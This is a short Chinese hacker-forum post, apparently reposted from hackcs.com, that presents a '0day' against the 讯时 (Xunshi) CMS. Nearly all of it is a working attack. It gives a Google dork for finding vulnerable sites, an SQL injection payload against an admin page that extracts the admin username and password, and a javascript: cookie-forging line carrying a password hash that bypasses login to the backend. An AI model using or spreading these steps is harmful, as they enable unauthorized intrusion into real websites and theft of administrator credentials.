« 上一篇下一篇 »

通杀讯时系统0day

转载请注明原文出处: 黑客战队论坛 http://www.hackcs.com  


经测试此0day通杀所有讯时系统。

google关键字inurl:news_more.asp?lm2=


 
复制代码
  1. /admin/admin_news_pl_view.asp?id=1   //id任意 填入以下语句
  2. 有时1显示错误信息的时候继续往后退2,3,4。。。。
  3. |'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
  4. cookies进后台
  5. javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));